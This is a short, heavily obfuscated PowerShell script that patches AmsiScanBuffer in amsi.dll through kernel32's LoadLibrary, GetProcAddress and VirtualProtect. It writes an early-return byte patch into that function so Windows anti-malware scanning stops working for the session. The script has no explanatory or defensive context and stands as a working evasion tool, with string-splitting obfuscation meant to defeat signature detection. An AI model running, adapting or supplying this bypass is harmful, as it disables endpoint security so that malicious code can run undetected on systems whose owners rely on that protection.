  &("{2}{1}{0}" -f 'Em','IT','sEt-') ("VARI"+"AblE:"+"hjv") ( [tYpe]("{0}{1}" -f'w','iN32')  )  ;   &("{2}{1}{0}"-f 'M','iTE','sEt-') ("v"+"Ari"+"A"+"B"+"le:KYlN")  (  [tyPE]("{10}{3}{9}{6}{0}{5}{1}{2}{7}{8}{4}"-F'ME.int','Ps','ervIc','ysT','RShAl','ErO','M.RUnti','es.','Ma','e','s'));${w`in32} = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

&("{1}{2}{0}" -f 'e','Ad','d-Typ') ${w`I`N32}

${Loa`d`li`Brary} =   ( .("{0}{1}{3}{2}" -f'Get','-Va','aBLe','Ri') ('HJ'+'V'))."VA`lue"::("{1}{0}{2}" -f'oadLibrar','L','y').Invoke("am" + ("{0}{2}{1}"-f's','ll','i.d'))
${aDD`RE`sS} =   ( .("{1}{2}{0}" -f 'e','VaRi','abL')  ("HJ"+"v")  -vAlU  )::("{2}{3}{0}{4}{1}" -f 'dr','ss','GetProcA','d','e').Invoke(${L`oAdL`Ib`RarY}, ("{0}{1}" -f'A','msi') + ("{0}{1}" -f 'S','can') + ("{0}{1}"-f'B','uffer'))
${P} = 0
  ( &("{0}{1}{2}"-f 'GeT-','VaRIa','bLe')  ('h'+'Jv')  )."Val`Ue"::"ViRTUa`l`P`ROT`ect"(${adD`R`eSs}, [uint32]5, 0x40, [ref]${p})
${PaT`Ch} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
 ${K`yLn}::("{0}{1}" -f 'C','opy').Invoke(${P`ATCH}, 0, ${aDDrE`SS}, 6)
